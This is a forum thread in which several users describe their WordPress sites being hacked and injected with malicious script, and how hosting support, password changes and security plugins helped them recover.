    I am very glad I found this thread before I loaded my new WP site with plugins. I have always wondered how secure they are. Thanks every one for sharing.
  • Profile picture of the author EddieWade
    Banned
    I think it was a similar thread these days on the topic.
    I have never experienced this situation so far with WP, but what I read here is quite scary.
    I will keep my eyes open and my plugins set!
  • Profile picture of the author roxitsc
    This happened to me too a few years ago, I had around 3 sites hacked. I was lucky that the guys from my hosting helped me out.
  • Profile picture of the author DWaters
    Yes, this is a very serious situation and should not be overlooked. I had my WP site injected with malicious script earlier this year. I had some sites on Google page one and they were all sent to kingdom come once this happened. I am only now starting to recover. WeWatchYourSite.com was some help, but their customer service response seems slow... maybe they are too busy ???

    I am only now recovering.
    Signature
    How I really Make Money With Amazon

    Want to get rich with top rated FREE Super Affiliate Training?
    • Profile picture of the author DWolfe
      I was hit three weeks ago, contacted my web-designer and he explained what it was but could not fix it.

      I have hostgator hosting these sites. I gave hostgator a call within 24 hours all were up and running. They also sent an email how to get these sites re-listed with google since they contained Malware. Once that was done I changed all my passwords and have been fine since.
      Signature


      You can earn 10% average annual returns on your investments - https://app.groundfloor.us/r/m2aa7b
  • Profile picture of the author Schnitzel
    Yes, I had like 2 of my sites hacked (on the same server). Other servers were not affected. I already used Login Lockdown and Antivirus and/or wp-firewall.
    Have now switched to a more advanced (paid) solution and have been hacker-free ever since.

    Also: if your host has been hacked it doesn't matter if you can restore your site because due to some (php) files on your server they can get in again and again and again until it's properly cleaned. But you got to ask an expert, which I am not. Just want to point out that security for websites is a topic which is not to be taken lightly and just because your sites seem to be fine again doesn't mean they are.
    Signature

    meh
